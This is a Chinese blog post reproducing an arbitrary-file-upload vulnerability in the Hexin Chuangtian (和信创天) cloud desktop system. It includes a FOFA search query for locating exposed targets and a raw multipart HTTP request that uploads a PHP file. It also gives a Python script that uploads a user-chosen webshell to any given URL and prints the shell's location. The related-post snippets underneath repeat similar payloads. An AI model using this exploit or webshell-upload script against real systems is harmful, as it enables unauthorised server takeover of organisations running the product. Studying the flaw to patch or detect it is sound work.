【漏洞复现】和信创天云桌面系统—任意文件上传

最新推荐文章于 2025-07-26 21:30:01 发布
最新推荐文章于 2025-07-26 21:30:01 发布
阅读量2k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 安全漏洞 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Kris__zhang/article/details/116725307

简介

和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计算,又可以利用终端本身的资源进行分布计算的“前后端混合计算”模式,从而有效解决客户终端在集中管理、高效运维和安全可用等难题。

漏洞

和信创天云桌面系统存在命令执行_任意文件上传,可上传恶意文件获取服务器权限
FOFA语句

title="和信下一代云桌面VENGD"

在这里插入图片描述

复现

payload:


POST /Upload/upload_file.php?l=test HTTP/1.1
Host: X.X.X.X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv


------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/avif


<?php
phpinfo();
?>
------WebKitFormBoundaryfcKRltGv--

在这里插入图片描述

在这里插入图片描述
POC:(python3)

import requests
import time
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
# fofa :body="和信下一代云桌面" 
p=input('请输入要上传的木马文件:')
i = open(p,'r+',encoding='utf-8')
pp = i.read()
url=input('请输入url:')
url =url
url1 = url + '/Upload/upload_file.php?l=test'

data = '''
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="l.php"
Content-Type: image/avif

{}
------WebKitFormBoundaryfcKRltGv--
'''.format(pp)

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
    "Content-Type": "multipart/form-data;boundary=----WebKitFormBoundaryfcKRltGv"
}
r = requests.get(url=url1,verify=False,timeout = 10)
if r.status_code == 200 and '_Requst' in r.text:
    #print(r.text)
    t = requests.post(url = url1 ,headers=headers,data=data,verify=False,timeout = 10)
    #print(t.text)
    if t.status_code == 200 and '_Requst' in t.text:
        print('存在和信创天云桌面系统_命令执行_任意文件上传')
        print('[#] 正在上传木马文件')
        time.sleep(5)
        print('马子地址为:'+url+'/Upload/test/l.php')
    else:
        print('[x] {}不存在和信创天云桌面系统_命令执行_任意文件上传'.format(url))
else:
    print('[x] {}不存在和信创天云桌面系统_命令执行_任意文件上传'.format(url))

在这里插入图片描述

我的微信公众号:刘一手学安全

在这里插入图片描述

漏洞复现|和信天云桌面系统存在任意文件上传&目录遍历漏洞
失心少年
06-27 496
和信天专注虚拟化云计算领域,为首家集VOI/VDI/IDV于一体的云桌面厂家,助力教育、医疗、政企、军工、电力、金融等行业客户实现千台终端统一管理,确保数据安全与业务连续性。和信下一代云桌面基于VDI/VOI/IDV三种技术架构优势,对于用户应用场景有着普遍的适用性,前后端混合计算保证在调度服务器后端资源的同时,也能充分利用前端计算资源,高性能的电脑和低功耗的瘦终端均能流畅地运行各种操作系统与应用软件,能够轻松实现千点以上大规模终端的集中管理。
和信天云桌面系统VENGD文件上传漏洞复现
afei001
04-25 563
目录 1.漏洞概述 2.漏洞分析 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 5.2 VESystem_VENGD_fileUpload_POC.py 5.3 VESystem_VENGD_fileUpload_EXP.py 5.漏洞修复 声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。请勿进行非授权测试,否则后果自负。 1.漏洞概述 和信天下一代云桌面系统融合了VDI、VOI、IDV三大架构优势的云桌面产品,实现了前后端混合...
和信天云桌面任意文件上传
weixin_43227251的博客
04-12 461
这里写自定义目录标题和信天云桌面文件上传getshell 和信天云桌面文件上传getshell 漏洞地址 http://xx.xx.xx.xx/Upload/upload_file.php 存在漏洞 构造post包 POST https://x.x.x.x/Upload/upload_file.php?l=../test HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (
和信天云桌面系统远程命令执行 RCE漏洞复现渗透测试
kelenwait的博客
07-15 1179
前言 和信天云桌面系统,官方介绍,市场上主要有华为、深信服、锐捷、和信天四大云桌面厂商,华为从网络设备的角度打造整体解决方案,深信服从安全的角度切入云桌面,锐捷主打针对教育行业的云课堂业务,但前三家厂商的云桌面产品多以传统VDI架构为主,和信天的下一代云桌面能够融合VDI、VOI和IDV三大架构。 漏洞影响:和信天云桌面系统 漏洞复现 poc POST /Upload/upload_file.php?l=1 HTTP/1.1 Host: 127.0.0.1:2001 User-Agent: Mozi
和信天云桌面系统_命令执行_任意文件上传
MD@@nr丫卡uer
04-12 1005
fofa title=“和信下一代云桌面VENGD” 漏洞复现 POST /Upload/upload_file.php?l=test HTTP/1.1 Host: X.X.X.X Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="1
fengjixuchui#Vulnerability-1#和信天云桌面系统命令执行,文件上传 全版本 RCE1
07-25
和信天云桌面系统命令执行,文件上传 全版本 RCE参考:。
和信天云桌面系统远程命令执行
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-31 389
若天下不定,吾往;​若世道不平,不回!
CaijiOrz#2021_Hvv#和信天云桌面文件上传1
07-25
描述存在某接口可被攻击者利用上传文件利用上传访问。
云桌面优缺点_云桌面的缺点分析
weixin_39987211的博客
12-28 2218
桌面即服务(DaaS)是一种桌面交付模型,由云供应商来维护主机和虚拟桌面并将其交付给用户。企业IT部门正在努力寻找一种低开销、可扩展的方式,来为移动办公用户提供桌面虚拟化功能。一些企业正在考虑将DaaS作为虚拟桌面基础设施(VDI)的替代方案,但是云桌面也存在一些潜在问题,比如网络延迟、安全性和授权成本等。DaaS的限制因为DaaS是基于云的解决方案,因此所有的顾虑都和云相关:比如云供应商的可靠性...
云桌面是坑,还是超赞的?就看你有没选对!
热门推荐
weixin_41391650的博客
07-20 3万+
提起云桌面,不少用户的反应都是 听起来很高大上 云端计算 云端存储 云端运维 但是 用户体验很不友好! 应用卡 刷屏 在线视频不流畅 偏头疼也是它造成的!   的确,市场上不少的云桌面使用体验不佳 这一方面是商家夸大了宣传效果导致的 “用我们家的方案 1台服务器跑60台终端 放心吧,绝对没问题” 交付后的体验可想而知   而没有按场景来选择云桌面 也是很大一部分原...
和信天下一代云桌面的三个“万万没想到”
04-25 1938
知名女演员李冰冰在第一次荣膺华表奖优秀女主角奖时,发表了一段感人至深的致辞:“刚才我从台下走到台上用了不到一分钟,但实际上我走了十年,终于拿到了这个奖项。”十年磨一剑,不...
漏洞复现】Nacos未授权访问
Kris__zhang的博客
04-23 6756
漏洞背景 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞漏洞复现 本地搭建 https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1 wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1tar -zxvf nacos-server-2.0.0-ALP
漏洞复现】XMind2020及2021beta版本存在xss漏洞导致任意代码执行
Kris__zhang的博客
05-11 2101
简介 XMind是一种功能齐全的思维导图和头脑风暴工具,旨在产生想法,激发造力,并在工作和生活中带来效率。数以百万计的用户们喜欢它 漏洞(xss) XMind2020及2021beta版本存在xss漏洞导致任意代码执行,可直接拿到目标主机权限 下载 官方连接: https://www.xmind.cn/download/ https://www.xmind.cn/xmind2021/beta/ 漏洞复现 XMind2020 【xss】 payload:<audio src=x onerror=co
漏洞复现】Apache Tomcat AJP文件包含漏洞(CNVD-2020-1048)
Kris__zhang的博客
05-20 972
1.影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 2.复现 2.1准备 攻击机:kali 192.168.227.130 centos7 192.168.227.132 docker 工具: six 2.2环境搭建 选取一个版本受影响的Tomcat,这里用Docker hub上的9.0.30版本的Tomcat镜像来复现 下载镜像 docker
漏洞复现】ThinkPHP5.x远程代码执行
Kris__zhang的博客
04-23 602
一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。 二、漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.23 三、漏洞复现 1、官网下载Thinkphp 5
去中心化时代的通信革命:briefing与cpolar技术融合带来的安全范式革新
最新发布
qq_62662919的博客
07-26 966
摘要:本文介绍如何在Linux Ubuntu系统使用Docker本地部署开源视频会议系统briefing,并通过cpolar内网穿透实现远程访问。briefing具有端到端加密、多因素认证等安全特性,支持高清视频通话和屏幕共享。Docker部署仅需一条命令即可完成,cpolar工具可建公网地址实现异地访问。文章详细讲解了从Docker安装、briefing部署到cpolar配置的全过程,并提供了固定域名的方法,帮助用户无需公网IP即可搭建私有视频会议系统,兼顾安全性与便捷性。
安全漏洞】网络守门员:深入理解与应用iptables,守护Linux服务器安全
07-26 1189
Linux中iptables的深入理解与应用
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值